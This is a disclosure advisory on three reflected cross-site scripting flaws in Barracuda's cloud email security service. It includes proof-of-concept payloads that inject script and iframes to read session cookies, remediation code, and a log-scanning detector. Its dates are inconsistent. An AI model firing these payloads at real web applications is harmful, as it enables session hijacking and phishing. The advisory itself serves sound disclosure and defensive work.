Barracuda Cloud ESS 2.x - Multiple Cross Site Vulnerabilities, Non-Persistent XSS in Barracuda Email Security v2.1.
Document Title:
===============
Barracuda Cloud ESS 2.x - Multiple Cross Site Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=742
Barracuda Networks Security ID: BNSEC-671
Release Date:
=============
2018-07-23
Vulnerability Laboratory ID (VL-ID):
====================================
742
Common Vulnerability Scoring System:
====================================
4.4
Vulnerability Class:
====================
Cross Site Scripting - Non Persistent
Current Estimated Price:
========================
1.000€ - 2.000€
Product & Service Introduction:
===============================
The Barracuda Email Security Service is a comprehensive and affordable cloud-based email security service that protects both
inbound and outbound email against the latest spam, viruses, worms, phishing and denial of service attacks. Barracuda Email
Security Service also includes email encryption and Data Loss Prevention features. The Barracuda Email Security Service
leverages advanced security technologies from the industry-leading Barracuda Spam & Virus Firewall and features rich multiple
cloud-based protection:
Rate control and Denial of Service (DoS) protection
Reputation-based blocking from known spam and malware sources
Anti-virus, featuring the patent-pending Barracuda Anti-Virus Supercomputing Grid
Anti-phishing, using the Barracuda Anti-Fraud Intelligence
Protection against spam, phishing, fraud and emails with other malicious intent
Custom sender/recipient policy
(Copy of the Vendor Homepage: https://www.barracudanetworks.com/ns/products/bess_overview.php )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple cross site vulnerabilities in the official cloud-based
Barracuda Networks Email Security v2.1.2 appliance application service.
Vulnerability Disclosure Timeline:
==================================
2017-07-23: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Barracuda Networks
Product: EMail Security Service Application Appliance (Cloud-Based) 2.1.2
Barracuda Networks
Product: Cloud Control Center 2.1.2
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Pre auth - no privileges
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Bug Bounty Program
Technical Details & Description:
================================
Multiple non-persistent input validation vulnerabilities have been discovered in the cloud-based Barracuda Email Security v2.1.2 Appliance Application Service.
The client-side cross site scripting vulnerabilities allow remote attackers to inject their own malicious script code into the client-side application via browser requests.
1.1
The first vulnerability is located in the `domain manager module - remove domain` function, in the exception-handling message (Confirmation required) that is
redisplayed when the request carries an invalid domain id. The application does not encode the invalid value before displaying it in the exception-handling
message, so the script code is executed on the client side in the main error message body. The attack vector of the issue is client-side (non-persistent)
and the request method to inject is POST.
1.2
The second vulnerability is located in the `custom_rbls` parameter of the `bulk_edit` module. It allows an attacker to inject their own script code into the
client side through the vulnerable `bulk_edit` form web context. The script code executes in the bulk_edit form next to the custom_rbls parameter input.
The attack vector of the issue is client-side (non-persistent) and the request method to inject is POST.
1.3
The third vulnerability is located in the `attachment_filters` parameter of the `bulk_edit` form module. It allows an attacker to inject their own script code
into the client side through the vulnerable `bulk_edit` form web context. The script code executes in the bulk_edit form next to the attachment_filters
parameter input. The attack vector of the issue is client-side (non-persistent) and the request method to inject is POST.
Exploitation of the three cross site scripting vulnerabilities does not require a privileged application user account, but it does require low or medium user interaction.
Successful exploitation of the client-side vulnerabilities results in session hijacking (customer/admin), client-side phishing, client-side external redirects to
malicious sources and client-side manipulation of the affected or connected module context.
Request Method(s):
[+] POST
[+] GET
[+] GET
Vulnerable Module(s):
[+] Domains Manager - Domains - Remove Domains Function
[+] Inbound Settings - Custom RBLs
[+] Message - attachment_filters
Vulnerable Parameter(s):
[+] remove_domain - ID+
[+] list custom_rbls
[+] list attachment_filters
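The three findings above share one root cause: a path segment (the domain id, or the bulk_edit list name) is reflected into an error or confirmation message without HTML entity encoding. The following Python example is added here and is not part of the advisory or of Barracuda's code. It models that reflection for the bulk_edit error message and the remove_domain confirmation form, and contrasts each with an output-encoded rendering (plus, for the id, an allowlist check). The template strings, function names and sample inputs are constructed for illustration.

```python
import html
import re

# Constructed sample inputs: the path segment following /settings/bulk_edit/,
# as it arrives after URL decoding. The hostile one mirrors the advisory's
# "%22%3E..." pattern (a closing quote and angle bracket, then a tag).
LIST_NAME_BENIGN = "custom_rbls"
LIST_NAME_HOSTILE = 'custom_rbls"><iframe src="x" onload="alert(1)">'

# Names the bulk_edit endpoint serves (from the advisory); used as an allowlist
# so the error path only ever sees a value that was already rejected.
KNOWN_LISTS = {"custom_rbls", "attachment_filters"}


def render_bulk_edit_error_vulnerable(list_name: str) -> str:
    """Reflects the list name straight into the message, as the advisory reports."""
    return f"<p>Invalid bulk edit list {list_name}</p>"


def render_bulk_edit_error_fixed(list_name: str) -> str:
    """Same message, but the value is entity-encoded before interpolation.

    quote=True also encodes " and ', so the result is safe in attribute
    context as well as element body context.
    """
    return f"<p>Invalid bulk edit list {html.escape(list_name, quote=True)}</p>"


def handle_bulk_edit(list_name: str) -> str:
    """Hypothetical request handler: allowlist first, encoded error second."""
    if list_name in KNOWN_LISTS:
        return f"<p>Editing list {list_name}</p>"  # safe: value is from our own set
    return render_bulk_edit_error_fixed(list_name)


def render_remove_domain_form_fixed(domain_id: str) -> str:
    """Confirmation form for finding 1.1: the id must be numeric and is encoded
    in the attribute context; rejected values are not echoed back at all."""
    if not domain_id.isdigit():
        return "<p>Invalid domain id</p>"
    action = "/domains/remove_domain/" + html.escape(domain_id, quote=True)
    return f'<form method="post" action="{action}"><h2>Confirmation required</h2></form>'


# Matches any tag other than the <p>, <form> and <h2> elements the templates emit.
_FOREIGN_TAG = re.compile(r"</?(?!(?:p|form|h2)\b)[a-zA-Z]")


def has_injected_markup(rendered: str) -> bool:
    """True if a rendered fragment contains markup the template did not produce."""
    return _FOREIGN_TAG.search(rendered) is not None


if __name__ == "__main__":
    for name in (LIST_NAME_BENIGN, LIST_NAME_HOSTILE):
        print("vulnerable:", render_bulk_edit_error_vulnerable(name))
        print("fixed:     ", handle_bulk_edit(name))
    print(render_remove_domain_form_fixed('2"><script>'))
```

The allowlist and the numeric check are defence in depth; the entity encoding alone is what closes the reflection, and it must be applied in the error path too, since that is exactly where user-controlled values end up on the page.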
Proof of Concept (PoC):
=======================
The client-side input validation vulnerabilities can be exploited by remote attackers without a privileged user account and with low or medium user interaction.
For security demonstration or to reproduce the vulnerabilities, follow the information and steps below.
PoC: Exploitation
<html>
<head>
<title>Barracuda Cloud ESS 2.x - PoC Multiple Cross Site Vulnerabilities</title>
</head>
<body>
<img src="https://ess.localhost:1338/settings/bulk_edit/attachment_filters%22" onload=alert(document.cookie)>
<img src="https://ess.localhost:1338/settings/bulk_edit/custom_rbls%22" onload=alert(document.cookie)>
<img src="https://ess.localhost:1338/domains/remove_domain/2" onload=alert(document.cookie)>
</body>
</html>
1.1 PoC: Domains Manager - Domains - Remove Domains Function - ID + Script Code - Invalid Exception-Handling - Display Script Code to Bypass Filter Check
<div id="page-hd">
<h2>Confirmation required</h2>
</div>
<div style="position: absolute; top: 86px; left: 0px; right: 0px; bottom: 0px; overflow: auto;" id="ess-content">
<form method="post"
action="/domains/remove_domain/SCRIPT>"> <[NON-PERSISTENT SCRIPT CODE INJECTION/EXECUTION!]">
>"<script>[removed]=true;<"> <[NON-PERSISTENT SCRIPT CODE INJECTION/EXECUTION!]>
<p>Are you sure you want to delete this domain? Deleting a domain will remove all associated settings and verification status.</p>
<p>
PoC: Link
https://ess.localhost:1338/domains/remove_domain/4[ID+][NON-PERSISTENT SCRIPT CODE INJECTION!];%22%3E%20%3Ciframe%20src=http://vuln-lab.com%3E
1.2 PoC: Inbound Settings - Custom RBLs
<p>Invalid bulk edit list custom_rbls"><iframe src="custom_rbls-[NON-PERSISTENT SCRIPT CODE EXECUTION!]" onload="alert("vl")" <<="" p="">
<p><a href="http://ess.barracudanetworks.com/settings"
class="btn"><span><span> OK
</span></span></a></p>
</div>
</div> <!-- ess-container -->
PoC: Link
https://ess.localhost:1338/settings/bulk_edit/custom_rbls%22%3E[NON-PERSISTENT SCRIPT CODE INJECTION!]
1.3 PoC: Message - Attachment_Filters
<p>Invalid bulk edit list attachment_filters"><iframe src="attachment-filters_bedit-Dateien/a.htm" [NON-PERSISTENT SCRIPT CODE EXECUTION!];)" <<="" p="">
<p><a href="http://ess.barracudanetworks.com/settings"
class="btn"><span><span> OK
</span></span></a></p>
</div>
PoC: Link
https://ess.localhost:1338/settings/bulk_edit/attachment_filters%22[NON-PERSISTENT SCRIPT CODE INJECTION!]
References:
https://ess.localhost:1338/domains/remove_domain
https://ess.localhost:1338/settings/bulk_edit/custom_rbls
https://ess.localhost:1338/settings/bulk_edit/attachment_filters
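For teams that operated the service during the affected window, the three endpoint paths listed above are also a useful detection hook. The Python example below is added here and is not part of the advisory. It scans web-server access logs for requests to those endpoints whose reflected path segment, after percent-decoding, contains a character that would break out of the message context. The combined-log layout is an assumption (adjust `LOG_RE` to the real format), and the log lines are constructed samples rather than records from any real system.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined-log style; not from any real
# system). Two are benign, three carry the encoded quote/bracket pattern the
# advisory's PoC links use.
SAMPLE_LOG = """\
203.0.113.5 - - [23/Jul/2018:10:01:02 +0000] "GET /settings/bulk_edit/custom_rbls HTTP/1.1" 200 512
203.0.113.5 - - [23/Jul/2018:10:01:09 +0000] "GET /settings/bulk_edit/custom_rbls%22%3E%3Ciframe%20src=x%3E HTTP/1.1" 200 640
198.51.100.7 - - [23/Jul/2018:10:02:15 +0000] "GET /domains/remove_domain/4 HTTP/1.1" 200 430
198.51.100.7 - - [23/Jul/2018:10:02:21 +0000] "POST /domains/remove_domain/4%22%3E%3Cscript%3E HTTP/1.1" 200 430
198.51.100.7 - - [23/Jul/2018:10:03:00 +0000] "GET /settings/bulk_edit/attachment_filters%22%20onload=alert(1) HTTP/1.1" 200 640
"""

# Assumed log layout: client, ident, user, [timestamp], "METHOD PATH PROTO", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# The endpoints named in the advisory; the trailing segment is what gets reflected.
WATCHED = re.compile(r"^/(?:settings/bulk_edit|domains/remove_domain)/(?P<arg>[^?]*)")

# Characters that close the attribute/element context the value is echoed into.
BREAKOUT_CHARS = set('"\'<>')


def find_reflected_xss_attempts(log_text: str) -> list:
    """Return one record per request whose reflected segment, after
    percent-decoding, contains a context-breaking character."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip
        w = WATCHED.match(m["path"])
        if not w:
            continue  # not one of the advisory's endpoints
        decoded = unquote(w["arg"])
        if BREAKOUT_CHARS & set(decoded):
            hits.append({
                "ip": m["ip"],
                "ts": m["ts"],
                "method": m["method"],
                "path": m["path"],
                "decoded_arg": decoded,
            })
    return hits


if __name__ == "__main__":
    for hit in find_reflected_xss_attempts(SAMPLE_LOG):
        print(f'{hit["ts"]} {hit["ip"]} {hit["method"]} {hit["path"]} -> {hit["decoded_arg"]!r}')
```

Decoding before matching matters: the advisory's own links carry the breakout characters as `%22` and `%3E`, and a rule that looks only for literal quotes in the raw request line would miss them. Because the check is scoped to the two reflected segments rather than the whole URL, it stays quiet on ordinary traffic to the same endpoints.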
Solution - Fix & Patch:
=======================
The issue was reported in 2016 Q4 and resolved in 2017 Q1 - Q4. The disclosure process took about 7 months.
Security Risk:
==============
The security risk of the multiple client-side cross site scripting web vulnerabilities in the cloud ESS application is estimated as medium.
Credits & Authors:
==================
Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or
implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any
case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its
suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental
or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface
websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories
or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails,
phone numbers, conversations or anything else to journalists, investigative authorities or private individuals.
Domains: www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website are trademarks
of the vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material, contact (admin@) to ask for permission.
Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™